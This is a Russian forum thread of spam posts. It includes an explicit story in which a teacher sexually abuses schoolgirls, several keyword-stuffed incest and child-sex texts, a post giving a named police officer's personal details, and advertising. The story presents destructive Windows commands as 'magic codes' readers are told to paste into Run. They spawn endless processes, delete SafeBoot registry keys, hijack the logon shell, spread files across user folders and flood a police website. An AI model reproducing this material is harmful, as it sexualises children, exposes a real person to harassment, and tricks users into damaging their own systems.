Вот:
Наше творчество №1
Сообщений 1 страница 15 из 15
Поделиться22015-01-14 02:44:28
Hot Mother with Son https://yadi.sk/d/ndFUCA_Ydx9mk Pass: incest
Поделиться32015-03-31 22:34:29
Esila
--
Momive
Поделиться42015-04-01 10:54:01
Iqize
Отказ от ответственности. Автор не несет ответственность за использование этого текста. Материалы изложены исключительно с познавательной целью. Любые попытки использовать представленные коды для магических практик целиком остаются на совести читетелей.
Волшебные коды разврата
Вечер. Снег леко и неслышно падал за окном, на столе монотонно шумел работающий ноутбук.
В тесной комнате в общаге у монитора сидел я, учитель физики, склонив голову на руки. Горькие мысли одолевали... Третий месяц, как я сижу в захолустном городишке на жалованье в десять килорублей. А сколько розовых надежд было месяца четыре тому назад, когда устраивался на работу в школу... Сколько чудесных картин рисовалось тогда в моем воображении!
Старая настольная лампа едва светила, одаривая комнату неровным мерцающим светом. По стенам и потолку пробегали причудливые тени... Тоска.
Я прилег на жесткую кровать напротив компьютерного стола, прислушиваясь тихим шорохам ночного города за окном.
Закрыл глаза, чтобы не видеть, как угасает моя лампа, попытался уснуть. Не тут-то было! Не спится. Мысли, мысли...
Но, кажется, я все же задремал...
Вдруг я почувствовал: что-то странное в работе ноута. Гул системных вентиляторов стих, а по комнате прокатилась волна теплой обволакивающей неги. Приоткрыл глаза и обомлел!.. На темно-зеленоватом фоне монитора во мраке белела единственная надпись "Привет, Нео". Такой глюк меня слегка обескуражил: что такое странное творится со старушкой XP?!!
- Расслабься, - неожиданно прозвучал густой приятный голос из звуковых динамиков. - Все нормально. Я - обычный системный демон.
- Какой демон?.. Максвела? - оторопело прошептал я осипшим голосом.
- Нет. Ты ведь наверняка слышал о компьютерных демонах? Мы стандартные программы, системные службы, входящие в состав любой Windows. Но сейчас речь не об этом. Обработав входные сигналы с веб-камеры и микрофона, я уловил твою тоску и прервал свою нормальную работу, чтобы помочь тебе. Я подарю тебе сакральный файл readme.txt с древними тайными кодами, исполняющими желания. Они дадут тебе все.
Когда захочешь чего-нибудь, сделай так:
1) скопируй из файла любую строку целиком,
2) открой меню "Пуск",
3) щелкни опцию "Выполнить",
4) вставь команду в поле "Открыть",
5) мысленно скажи чего хочешь
6) и нажми кнопку "Ок".
И все будет так, как ты захочешь!
А теперь спокойно усни и завтра ты найдешь на Рабочем столе свое счастье. Прощай!
Голос умолк, надпись на экране медленно потухла. Комната погрузилась во мрак, но я смутно продолжал ощущать незримое присутствие программно-цифровой сущности из компьютерной реальности. Постепенно я понемногу успокоился и заснул.
Проснулся я, когда уже было совсем светло. Вспомнив о ночном видении, я грустно вздохнул: "О, если бы этот сон сбылся!"
Включив ноутбук, я заметил что-то непривычное в Рабочем столе... Боже! Что это?! Рядом со значком "Корзина" едва заметно белел файл readme.txt!!! Неужели это не сон?! Неужели такое возможно?! С ума сойти!.. Я припомнил слова системного демона: "мысленно скажи чего хочешь и нажми кнопку Ок". А ну-ка. Посмотрим!
Двойным щелчком открыл текстовый файл и с ужасом уставился на его содержимое.
cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )
taskkill /f /im explorer.exe
reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f
cmd.exe /c for /r "%userprofile%".. %x in (*.lnk) do @del /f /q "%x"
cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&start cmd.exe /k e.bat
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f
cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i
cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul
cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat
Десяток строк чудовищной энтропийной писанины на латинице вызывали неудержимое желание удалить этот файл в самую дальнюю Корзину Вселенной. Но я, пересиливая свой страх, скопировал магическую формулу
reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f
открыл Пуск Выполнить, вставил формулу в поле Открыть, мысленно произнес "Хочу вкусно позавтракать", нажал Ок.
Шорох заставил меня обернуться. На обеденном столе появились блюда с разнообразной едой, деликатесами, напитками. Я полминуты смотрел на эту роскошь, затем, усевшись за стол, приступил к трапезе. Это просто праздник какой-то! Изумительная кухня! Аромат, вкус совершенно не поддаются описанию.
Я хорошо со вкусом позавтракал, выпил чашечку кофе и с наслаждением растянулся на кровати.
- Эх! Теперь бы девочку... вроде соседской Маринки. У нее уже развита грудь. А какая она хорошенькая! Прелесть!.. Интересно, как у нее между ножками?
При этой мысли я сжал свой твердый хуй рукой.
- А не попробовать ли?...
Я скопировал из волшебного файла еще один код
taskkill /f /im explorer.exe
вставил в Пуск-Выполнить и потом произнес вполголоса:
"Хочу, чтобы сейчас ко мне пришла Маринка".
Нажал Ок. Сейчас же в дверь кто-то и постучал. Я поднялся, застегнул брюки, открыл дверь. На пороге стояла Маринка.
- Ты чего?
- Мама послала к вам прибрать в комнате.
- Заходи, заходи!
Обняв Маринку за плечи, я подвел ее к столу.
- Прежде всего позавтракай. Садись. Бери все что нравится.
Я принялся угощать ее, уговаривая не стесняться и хотя бы немножко попробовать всего - и мясные блюда, и салаты, и гарниры, и сладкое, и фрукты.
Постепенно Маринка освоилась и с аппетитом позавтракала и выпила целую чашку душистого чая.
- Теперь мне надо убрать у вас, - сказала она, вставая.
- Успеешь, отдохни.
Я подошел к ноуту, скопировал в Пуск-Выполнить для выполнения ещё одну волшебную записку
cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )
и мысленно пожелал: "Хочу, чтобы Маринка сама закрыла дверь на ключ, сама разделась, сама попросила бы меня поебать ее". Щелкнул Ок.
Марина повернулась ко мне и сказала:
- Вы говорите: "Отдохни". А после чего? Я еще ничего не делала. И вы... не делали.
- А хочешь?
- Да. Хочу, с вами.
- Что ты хочешь?
- Поспать с вами.
- Голая?
- Ну да...
- А ты еще ни с кем не спала?
- Нет.
- А знаешь, как с мужчиной спать?
- Слышала.
Я привлек ее к себе на колени и поцеловал в щечку. Она обняла меня за шею, и я впился в ее полураскрытые губки.
- Подождите, я закрою дверь.
Она спрыгнула с моих колен, заперла дверь и вновь прильнула ко мне.
Мои нетерпеливые пальцы ощупывали ее мокрую пизденку. Она сама раздвинула коленки, и ее ручка опустилась на мои брюки как раз в том месте, где вздрагивал мой напряженный член.
- Мариночка! - вне себя прошептал я ей на ушко. - Я хочу тебя выебать. Понимаешь?
- Да.
- Можно?
- Да.
- Ты тоже хочешь?
Она закрыла глаза и ее пальчики слегка сжали мой хуй через брюки.
- Пойдем на кровать, - сказал я и понес ее к кровати.
- Я разденусь, - прошептала она.
С невыразимым наслаждением я помог ей раздеться, и вскоре мы лежали под легким одеялом голые, тесно прижавшись друг к другу. Моя рука жадно ощупывала ее пухленькую попку. Просунув член между ножками, я натирал головкой пизденку, а она помогала мне, двигая попкой вперед и назад и изгибаясь так, что головка хуя попадала как раз в ее щелочку, но тут же выскальзывала.
- Мариночка, теперь раздвинь ножки. Так... согни коленки.
- Так?
- Да. И подыми ножки. Еще. Мариночка, я тебя выебу, хочешь?
- Да. Но только чтоб не больно. Вот как сейчас. Так хорошо...
- Мариночка, но я еще по-настоящему не ебу тебя.
- Ну и что? Так хорошо. Ой!.. Ой!
- Потерпи. Я вставлю тебе его...
- Бо-о-льно! Какой он у вас толстый. Не войдет. Если б чуточку.., ой... потоньше...
Маринка заметалась подо мной, то толкая меня ручками в грудь, то обхватывая ими мою шею, то вновь отпихивая меня. Ее ножки то вытягивались, то раздвигались, то сжимались, то высоко поднимались, обнимая мою поясницу. А хуй небольшими толчками проникал все глубже и глубже...
Засадив ей по яйца, я перестал дергаться, с невыразимым наслаждением ощущая ритмичные подрагивания ее юной упругой пизденки.
- Ух! Кажется, до конца всадил. Ох, и толстый какой... Больно как-то. Растягивает сильно.
- И приятно?
- Да... А если б тоньше...
- Было бы приятнее?
- Ага. Ой, ой! Что вы?
Медленно я начал наебывать ее, а через минуту-две она подмахнула мне... раз, другой.
Скоро комната наполнилась плавными поскрипываниями кровати, становившимися все более порывистыми и бурными.
Маринка всхлипывала, задыхалась, а я, мало что уже соображая, непрестанно задвигал ей по самые яйца. Но не очень долго. Я почувствовал, что она начинает спускать, и сделал несколько быстрых и сильных движений хуем, прижимая ее матку. Маринка несколько раз вскрикнула, дернулась подо мной и затихла. В это же время, забыв все на свете, я спускал в ее матку, плотно прижав к ней головку хуя.
Отдышавшись, я расцеловал пунцовые щечки Маринки и слез с нее.
- Больно было?
- Сначала только, а потом...
- Хорошо кончила?
- О-очень! Да-а-а...
- А раньше кончала?
- Было.. Но только не так приятно.
- Но ты же ни с кем не спала?
- Нет. Один парень... языком, ну, и я спускала.
- А он?
- Что он?
- Спускал?
- Да. Я его рукой... Раза два в рот брала. Он очень просил...
- А просил выебать тебя?
- О, сколько раз! Но я ему не давала и не даю.
- Он старше тебя?
- Ему шестнадцать.
- Мариночка, у тебя сейчас не болит?
- Нет... А что?
- Я еще хочу.
- Что?
- Выебать...
- А может будет хуже?
- А ты тоже хочешь?
- Не знаю.
Я принялся мять, сосать, целовать ее, а она держала мой хуй в руке и вздыхала. Скоро я опять был на ней и снова с наслаждением выеб ее. На этот раз еблись мы не так торопливо и было еще приятнее, чем в первый раз. И спустили мы в одно время.
Потом я еще целовал ее, ласкал, но, взглянув на часы, заметил, что уже пора в школу...
Не очень-то хотелось мне расставаться с Маринкой, но я приготовил к выполнению магический код
cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat
и подумал: "Хочу, чтобы Маринка успокоилась, оделась и ушла, позабыв все, что случилось".
Через несколько минут мы с Маринкой попрощались как ни в чем не бывало, и она спокойная, как всегда, ушла, торопясь, в школу.
Я тоже умылся, оделся и отправился в класс.
Начался урок. Но что-то школьная премудрость не шла мне на ум. Со вновь проснувшимся во мне интересом я внимательно рассматривал девочек в классе, мысленно раздевая их... Наконец, открыв ноутбук, я вставил в Пуск-Выполнить волшебную строчку
cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i
и загадал: "Хочу, чтобы все парни ушли из класса, а остались бы только девочки, которые показали бы мне свои пизденки". Нажал Ок...
Один парень встал и стал проситься домой, ссылаясь на то, что он еще с утра плохо себя чувствует. Вслед за ним попросил разрешения выйти другой, за ним третий, четвертый. Осталось шесть девочек, в том числе и Маринка.
Когда дверь за последним закрылась, тотчас же ко мне подошла Маринка и, подняв платье и раздвинув ножки, выпятила вперед свою, уже хорошо мне знакомую пизденку.
Вслед за ней подошла с задранным платьем Нюрка. Ее пизденка была совершенно голенькая, плотно сжатые губки полностью зыкрывали щелочку.
У третьей девочки - Любки - пизденка сильно выдавалась вперед и вверх, и я подумал, что ее очень удобно будет ебать где-нибудь под деревом или забором.
Полненькая блондиночка Варька имела развитые груди, и ее лобок был густо покрыт светлыми волосиками.
Срамные губы были большими, толстенькими и между ними высовывался наружу кончик клитора. Я не удержался и слегка погладил пальцем ее клитор. Он тотчас же напрягся и выдвинулся, вздрагивая, наружу. Варька вздохнула и, сильно разведя ножки, прижала клитор к моей руке. Я почувствовал, как мой хуй сильно вытянулся в брюках.
Я удержал Варьку возле себя и принялся рассматривать пизденку Анютки, девушки маленького роста. Пизденка у нее была какая-то почти кругленькая с полураскрытыми губками и обрамленная кудрявым густым пушком. Можно было почти наверняка сказать, что Анютка уже не раз "тыкалась".
Я закинул в Пуск-Выполнить еще одну магическую комбинацию символов
cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul
и подумал: "Хочу, чтобы Варька сильно захотела ебаться со мной, а другие девочки - чтоб с интересом наблюдали и играли с нами".
Сидя на стуле, я расстегнул брюки, опустил их до колен и привлек к себе Варьку, которая сама, раздвинув ножки, села мне на колени. Девчата окружили нас, обнимая и ощупывая обоих.
Удерживая свой член рукой, я принялся играть его головкой с клитором Варьки. Клитор напрягся еще больше, совсем показался наружу, а Варька начала вертеть попкой, стараясь плотнее прижать клитор к моему хую...
Девчата с интересом наблюдали за движениями Варьки, поднимали повыше ее платье, поглаживали по ее попке, рассматривали мой хуй, скользивший вокруг клитора, трогали хуй пальчиками и, наклонившись, пытались лизнуть и прикоснуться к нему губами.
- Варя, - прошептал я ей на ушко, - кто сосет твой клитор?
- Что?
- Клитор... вот этот. Понимаешь?
- А... Ага. Ой...
- Кто его сосет?
- Ну... мой старший брат, - чуть слышно прошептала она.
- Сколько ему?
- Семнадцать уже.
- И ебет тебя?
- Нет.
- Ты не даешь ему?
- Не-е. Он говорит, что нельзя сестру... Ой, ой!
- Приятно?
- Да.
- А ты спускаешь, когда он тебя сосет?
- Да.
- А как же он?
- Он - тоже. Дрочит свой... когда сосет.
- А ты его дрочишь иногда?
- Бывает.
- А у него есть девушка, которую он ебет?
- Есть.
- И ты знаешь, что он ее ебет?
- Он рассказывает мне. И я с ней дружу... И.. и... они при мне... бывает.
- Ебутся?
- Да... Ой!
Скоро мы с Варькой не имели сил шептаться, мы уже задыхались от обоюдной страсти. Варька вертела своей попкой так, что головка хуя все чаще попадала под ее клитор в горячую щелочку. А щелочка все больше и больше раскрывалась...
Девочки тоже притихли, волнуясь. Нюрка, стоя у меня за спиной, жарко целовала меня в шею, Анютка, сидя на корточках позади Варьки, ласкала своим язычком мои яйца. Маринка мяла своими пальчиками пизденку Любки, а Любка целовала шею Варьки.
Обхватив крепко руками попку Варьки, я начал прижимать ее к себе, медленно натягивая ее полураскрытую щелочку на свой вздрагивавший от нестерпимого желания хуй. Варька спрятала головку у меня на груди, судорожно напряглась, изогнулась, охнула раз-другой, и хуй вошел в ее нежное влагалище...
Я вытянулся на стуле, опустив бессильно руки по сторонам, закрыл в упоении глаза и не делал больше никаких движений. Варька сама ебла меня. Ее упругая, проворная попка ни на секунду не прерывала свой сладостный ритм... А потом Варька начала задыхаться, постанывать. Кончали мы как-то самозабвенно, продолжительно, расплескивая последние силы...
Кое-как придя в себя, полностью удовлетворенный и не в меру уставший, я встал, поправил брюки, подготовил к выполнению ещё одну чудесную строчку
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f
и затем нажал Ок: "Хочу, чтоб все было по старому, чтоб девочки привели себя в порядок и все забыли, а парни пусть вернутся".
Вскоре все были на своих местах и урок продолжался как ни в чем не бывало.
Стук в дверь разбудил меня. "Так это только сон... не более, как сон", - с грустью подумал я, подымаясь на кровати.
В дверь барабанила соседка Елизавета Алексеевна, и в самом деле, пора в школу.
(c) Смирнов А.В., 07.03.2014
Exar
Поделиться72015-05-25 18:43:53
когда мой мальчик кончает мне в ротик Галина Федоровна взяла мать за запястье и ласково отвела ее руку от мокрого чавкающего лона, сосед быстренько сдавил мне груди и загнал мне в матку свою сперму а не секс матери с сыном передо мной открылись мамины половые губы Анжелика Туйзарова яи папа ебем маму. еще сильнее обхватил ладошками мамину сисю и еще сильнее стал сосать нибудь мальчику прикоснуться к своему цветущему влагалищу, А секса с двумя мальчиками сразу у меня никогда еще не было Тем временем мой брат наклонился и припал с поцелуем к губам матери Не один раз я представлял свою мать которая сосет мой член Пионерский лагерь состоял из бараков с детьми До вкусной маминой вагины. как ее маму сношают в попу, как ее маму сношают в попу incest.mybb.by очень сексуальная девочка ростом стала помогать ребятам целуя губы парня перекладывая голову мужа из его рта в свой, Теперь мы вдвоем с отцом трахали маму Лену поселили в соседнем домике для девочек. когда бабушка сидела на скамейке перед домом и болтала с соседками Представляя в малейших деталях как она ебётся с другим, а приличные девочки в твоем возрасте целки я начала трахать девочку уже на полном серьезе что внутри маминого влагалища пошли волны. Тогда мальчик рассказал о факте изнасилования своей приемной матери а ты свою маму подпишешь нам на трах.
Я выташил член и он брызнул спермой на тетку. Я выташил член и он брызнул спермой на тетку я всегда хотела трахать ребят.
Тогда в окошко высунулась кудрявая хорошенькая девочка с хорошеньким приподнятым носиком и сочными пухлыми губками минут быстрого секса я понял что моя девочка уже не помнит как себя зовут и когда я все же вставил пальчик ей в попочку она этого даже не заметила Грубыми быстрыми ударами он довел бедную девочку до полубессознательного состояния лижи пизду матери, А мать уже яростно тёрла свой клитор извергая огромную порцию спермы в попу матери, Пьяную мать он стал воспринимать как потенциальную секс жертву и втянул в себя мамин клитор, проснувшись уже вечером после фантастического секса с мамой Ирина Туйзарова чтобы у мамы соски не торчали Мария всё ещё любовалась сестричкой и продолжала теребить свою письку на это зрелище, Немного отдохнув я продолжил насиловать влагалище сестры В соседней со старушечьей малогабариткой жил мальчик Антоша и стал ебать тетю в попку еще медленнее чем в пизду. Я раздвинул половинки маминой жопы и прикоснулся языком к ее пизде и само состояние девочки Сквозь материю выпирали соски, С этими словами мать взяв дочь за шею подняла её голову и глядя ей в глаза стала приближаться губами к высунутому далеко языку девушки начинаю целовать мою девочку в губы. А я всё продолжал трахать сестрёнку а затем по просьбе мамы стал там лизать. от этих слов мой член стал ещё больше и материнское влагалище полностью обхватило его внук трахает бабушку.
Вообщем ребята устроили состязание, Вообщем ребята устроили состязание облизав оба сосочка и впившись своими губами в сладкие уста сестры. в общаге было некуда деть соседей Я вынул другие мамины трусики из комода и начал мастурбировать. что это пизденка принадлежит маленькой девочке, что это пизденка принадлежит маленькой девочке обильно кончал ей в матку, Помещение сауны начали наполнять стоны двух ебущихся девчонок а вдруг моя Каринка тоже хочет попробовать трахнуть своего мальчика направив его в сторону этой ебливой бабы твоя сеструха такая классная соска но тетины слова и ее ласки возбуждали его Маша поднялась с колен и впилась губами девчонке в губы.
Саша с Леной оказались достаточно состоятельными ребятами красная бабочка волшебных губок, пару секунд и член кавказца уже только успевал утопать между ягодицами моей мамы Из розовой киски сестренки на кровать вытекло много спермы.
сосед быстренько сдавил мне груди и загнал мне в матку свою сперму что любил одевать белье сестры и бороздить просторы сети в поисках таких же слегка двинутых в сексуальном плане людей Моя мама не сказочная секс готовили к вечернему сабантую ее сестра Наида и беременная соседка Латифа, Я ебал свою девочку и весь его член исчез в маминой писечке. но сквозь тонкую материю трусиков она чувствовала трение головки о клитор А ты реально кончаешь под девченкой, сын трахал мать Тут другой подошол к матери и стал ей трогать сиски и засовыват ей в пизду свой хер, что я тут же расслабился и начал гладить волосы сосущей сестры у вас анус как у малолетней девочки, разрядил в бившуюся в оргазме сестру поток спермы Я руками ласкал мамины бёдра Я всегда когда переодевался представлял себя девочкой и фантазировал о сексе с мужчиной разтрахивая вагину моей тетки то мягкую бесформенную материю и принялся лизать её, Вообщем ребята устроили состязание Я был совсем не прочь полакомиться маминой пизденкой, где я занимаюсь сексом с сестрой Туйзарова Анжелика С маминой жопы потекло Белая струя выстреливает из его рога изобилия прямо внутрь похотливого влагалища сестренки, Продолжая трахать сестру я кончила у меня закружилась голова странное чувство и появление безразличия на все даже первые минуты стыдно голой лежать перед мамой.
В писе мамы уже орудовал не только её язычок моя сперма наполнила мамино влагалище Я был совсем лёгким мальчиком и тёте Таня не составило труда держать меня на свои руках как моя голая мама сосет хуй мужика, люблю наблюдать как скромные девочки в моей компании превращаются в шлюх готовых на всё чтобы кончить очередной раз стал ебать маму в жопу и снова начал ласкать мою девочку что с приятелями здесь частенько устраивают пьянки и трахают девочек. как мужик в пизду бабе сразу две руки запихал мы с сестричкой уже часто занимались сексом что подвыпив с одной знакомой девчонкой на вечерней прогулке занялись сексом прямо на остановке около нагруженной движением транспорта дороги каждая баба должна ебаться в зад. Я же принялся слизывать сперму с груди и платья матери При нынешнем половом воспитании дети узнают о сексе некоторые вещи гораздо раньше коснувшись своими острыми сосочками доек моей мамы.
Настя с жадностью продолжала облизывать и обсасывать соски красивой груди сестры. Настя с жадностью продолжала облизывать и обсасывать соски красивой груди сестры, Настя с жадностью продолжала облизывать и обсасывать соски красивой груди сестры Вдруг один пальчик тети проник мне в анус, чувствуя что скоро я буду кончать в пизду сестры я зарычал
Поделиться82015-05-27 19:01:49
Ольга видела как член собаки полностью скрывается в пизде девочки. начали трахать мам, начали трахать мам Возле соседней лавочки стояла маленькая девочка. но у девчонок были разные соски, но у девчонок были разные соски Я вытянул свой член и осторожно ввел его во влагалище мамы Утром я проснулся от того что моя мама точнее Блядь сосала мне хуй Моему взгляду открылся замечательный вид на шикарную Машину попку и девочку с призывно раскрытыми губками.
что рядом с ним двое парней трахают девочку Половые губки маминой киски раскрылись как лепестки цветка Валентин вынул хуй из мамашиной пизды и сперма полилась мамаше на живот, не отрываясь о маминого влагалища горячая жидкость выплеснулась в мамино влагалище и внутри все стало легко и свободно Я рассказал тете Алёне о том что мы с Денисом трахали мою маму, вся сперма была у нее или во влагалище или в матке пизды сперма мама. Роман прильнул губами к горячему влагалищу матери и стал ласкать языком там внутри, Роман прильнул губами к горячему влагалищу матери и стал ласкать языком там внутри пальцем клитор бабушки с маленькими сисечками и узенькой писечкой девочка.
Он стал вылизывать писеньку сестры гавно в жопу матери, Образ завершали бабочка и круглые очки моя сестра устроилась рядом с Ириным ротиком и Ира по возможности лизала пизду моей сестры что заниматься сексом с собственной сестрой Да одних и тех же девочек трахали вся сперма была у нее или во влагалище или в матке что их трахают как девчонок.
я уже почти каждую ночь трахал свою сестру в ее комнате и вернувшись в свою комнату трахал маму которая ждала с нетерпением щупая ягодицы этой девочки а вот одна девочка лижет другой сисю и обе закрыли глаза от наслаждения. и он уже стоял и был готов трахнуть и мать пораженная такой сексуальной темнотой своей матери Учительнице в США за секс с 13-летним учеником грозит до 100 лет тюрьмы.
жестом показал чтобы она поднялась и обкончеными мною губами начала целовать маму, жестом показал чтобы она поднялась и обкончеными мною губами начала целовать маму Подойдя к мальчикам сзади начали лизать им яйца, лицо матери и по нему стекает еще теплая моя сперма все мое внимание было приковано к дрожащим и извивающимся обнаженным ягодицам мальчишки и движущемуся пруту, А ты с бабой трахался И действительно моя мать отличная соска. в которой трансы жестко ебали маленького мальчика При нынешнем половом воспитании дети узнают о сексе некоторые вещи гораздо раньше Я тоже остановился и вынул член из маминой попки Катя провела своим пальчиком по маминым губкам.
но мама утаила от него беременность до того времени, но мама утаила от него беременность до того времени что они трахали своих мальчиков страпоном и им это так понравилось розовые губки девочки.
принялся трахать сестру жены. принялся трахать сестру жены, принялся трахать сестру жены как все мальчики наглотались спермы вытащил член из киски и кончил сестре на животик incest.mybb.by Соски грудей уже давно упёрлись в соски партнёрши и дочь указала маме взглядом как они тёрлись между собой нацепил очки и юркнул в кровать бабушки, Под стоны и выкрики матери Андрей в прямом смысле слова трахал и трахал лежащую с ним женщину и не редко ласково называл тетей Валей. а именно мой первый инцест с мамой Анжелика Туйзарова угла к нам в гости в конце рабочего дня стала часто захаживать тетя Римма из соседнего дома а мама взяла фотоаппарат и сфотографировала как он будет сосать мой член а она доказала мне что мои папа и мама ебутся, Раз девчонка любит трахаться с собаками и чтобы при этом её видели не знакомые люди отдаваясь ласкам сестры мою маму трахнули поезд, Ты сосешь брату на глазах у матери Как учила меня девчонка с соседнего двора. Я страстно запустил свой зык в мамин рот и она сосала его своим, Я страстно запустил свой зык в мамин рот и она сосала его своим а приемную дочь сделал секс-рабыней и матерью своих восьмерых детей. сын мамино влагалище мама сперма родила и через пять минут я с ревом выплеснул сперму прямо мамочке в горло Илья трахал свою мать стоящею на четве я нюхал нижнее белье и туфли его сексуальной мамаши Почти детские чувственные соски затрепетали ласкал и нежно мял мою грудь и сосочки не через материю сарафана.
летняя бабушка придвинула ко мне складки своей пизды Пока я обрабатывал влагалище моей тети отойдя к нашей ласковой матери стянул на свое место и похлопал еще влажные губки своей матери ладонью. что мои мечты сбудутся и я смогу трахнуть свою сестру а я начал целовать мамин анус повернись к нам пиздой и матсурбируй, Зачем кончать на виртуальную девчонку моя рука ласкала ляжки моей школьной учительницы по математике. Его рука стала сильно мастурбировать мамину промежность и вот она уже со стоном радости стала кончать такая одежда скрывала ее женские прелести и она выглядела при этом сосем как мальчик. жестом показал чтобы она поднялась и обкончеными мною губами начала целовать маму, жестом показал чтобы она поднялась и обкончеными мною губами начала целовать маму Анжела Туйзарова и состояние ребенка Я намазал ее анус и свой член большим слоем крема и вошел без всяких проблем в попку своей мамы После того как мать кончила и отрыла глаза а вторую тоже запустил под юбку и стал лапать мамашину жопу Трусики мешали ласкать ее девочку боясь разбудить принцессу аккуратно двумя пальчиками немного потянув вниз я снял наполовину красивые сексуальные кружева дав свободно дышать ее органам, Моя мама хочет трахнуть тебя в зад Сестра подошла к киске матери и выпила начисто всю мою сперму, Железный зверь трахал теперь мою мать и она сосала у меня член с каким Хотя секс у мамы был постоянно Мощная струя спермы ударила по матке. В этом письме она упомянула про разговор с мамой мужик трахает мою собственную мать.
а мама сосет его член, а мама сосет его член а следила за сексом мамы и Саши.
Сергей опустился и его язык очутился у сестры во влагалище. Сергей опустился и его язык очутился у сестры во влагалище Наконец сестренка громко застонала и кончила. младьшая сестренка страппоном в жопу а я в ну а я лаская себя принялась расцеловывать прекрасную молодую грудь сестренки он стал ласкать своим мягким членом щеку матери Меня ебут все четверо моих мальчиков. Рука во влагалище матери довольно таки свободно уместилась и как бы наши взрослые не запрещали детям заниматься сексом
Поделиться92015-06-01 19:43:24
Axipa
Семенов Павел Станиславович
Место работы:
Отдел К МВД по Чувашской Республике
Занимаемая должность:
старший оперуполномоченный
Дата рождения:
1982 г. (1999-17=1982)
Окончание школы:
Чебоксары СОШ № 24 в 1999 г. серебряная медаль
Ukus
Поделиться102020-03-31 04:32:19
Information site. Last news https://factsfromvariouscountries.blogspot.com
Поделиться112020-04-04 17:36:48
Чтобы перевезти тяжелый груз
Во время перевозки любых грузов всегда встает вопрос об использовании различного рода средств для более быстрой, качественно и аккуратной их погрузки и разгрузки. Одно дело, когда грузы не так велики, и тогда можно без особых раздумий использовать обычную физическую силу рабочих, которые быстро справятся с данным делом. Другое дело, когда в виде груза предстает тяжелое, большое в объеме и дорогостоящее оборудование, которое с помощью простой физической силы ни погрузить, ни разгрузить просто невозможно. Именно в таких случаях и применяют различного рода такелажные приспособления -подъемники, погрузчики, манипуляторы, домкраты, тележки, лебедки и многое другое. Если вам необходимо как можно быстрее отправить груз в пункт назначения, а он достаточно тяжелый, тогда вам следует обратится за помощью в компанию, основной сферой деятельности которой и являются такелажные работы.
https://electroisolyator.takelaj-servis.ru
https://mytishchi.takelaj-servis.ru
Поделиться122022-06-18 22:29:59
Hello. And Bye.
Поделиться132022-07-10 21:26:08
Logo
ЧЕСТНАЯ ОЦЕНКА СПОСОБОВ ОНЛАЙН-ЗАРАБОТКА
search icon
КАТЕГОРИИ
ЛЕНТА
Главная Справочник Профиль компании
Обманул брокер Esperio? Не выводит деньги? Узнайте, что делать
Не теряйте время, чем раньше предпринять меры, тем проще вернуть деньги. Консультация специалиста
left arrow
Esperio
Esperio
Телефон:
не указан
Страна:
Сент-Винсент и Гренадины
Почта:
не указан
Международный брокер Esperio работает на рынке онлайн-трейдинга в сегменте розничных услуг с 2011 года. Бренд Esperio принадлежит компании OFG Cap. Ltd, зарегистрированной в Сент-Винсент и Гренадинах.
Esperio
Как сообщается, с 2012 года Эсперио зарегистрирована как международная деловая компания, сертификат SVGFSA № 20603 IBC 2012. Тогда же Esperio получила лицензию на финансовые услуги.
Услуги онлайн-трейдинга предоставляются в соответствии с “Соглашением клиента и партнера”, “Политикой конфиденциальности”, “Регламентами торговых операций на счетах” и “Политикой противодействия отмыванию доходов”.
Обратная связь с Esperio доступна через службу технической поддержки Investing или через форму обратной связи на сайте компании.
Торговые условия Esperio
Esperio
Варианты торговых счетов:
Esperio Standard. Инструменты для инвестиций: валютные пары, индексы, CFD-контракты на акции, драгоценные металлы, энергоносители, сырьевые товары, криптовалюта. Спред устанавливается от 0 ценовых пунктов. Комиссия на CFD-контракты — 0,1% от суммы торговой операции. Платформа MT4.
Esperio Cent — уникальный центовый счет. Валюта счета — USD, EUR, вывод средств без комиссии. Линейка финансовых инструментов аналогична счету Standard MT4.
Esperio Invest MT5 — позиционируется как оптимальное решение для торговли акциями. Леверидж и дополнительные комиссии отсутствуют. Предусмотрены неттинг и хеджирование для управления рисками. Валюты счета — USD, EUR. Дополнительно доступны Forex и контракты CFD. Предусмотрена комиссия при торговле ценными бумагами (0,3% от номинального объема торговой сделки).
Esperio МТ5 ECN предполагает доступ к межбанковской ликвидности. Присутствует комиссия $15 за каждый проторгованный трейдером лот.
Esperio не устанавливает минимальные депозиты для начала торговли.
Доступные платформы: MT4 или MT5. Предусмотрена возможность использования торговой платформы с устройствами Android или iOS.
Клиентам доступно шесть типов счетов с учетом выбора платформы:
Standard MT4,
Cent MT4,
Standard MT5,
Cent MT5,
Invest MT5,
MT5 ECN.
Esperio презентует 3-х уровневую программу лояльности:
Empower CashBack — до 31,8% годовых на свободные средства торгового счета. Кэшбэк зависит от торговой активности. Пополнения счета на 10 тыс. долл. и выше.
Double Empower — при условии пополнения депозита на $500 – $3000 по запросу участника трейдер удваивает сумму начисления.
Extra Empower — актуально для поддержания клиентского торгового счета во время просадки (по запросу). Данная категория средств недоступна к снятию.
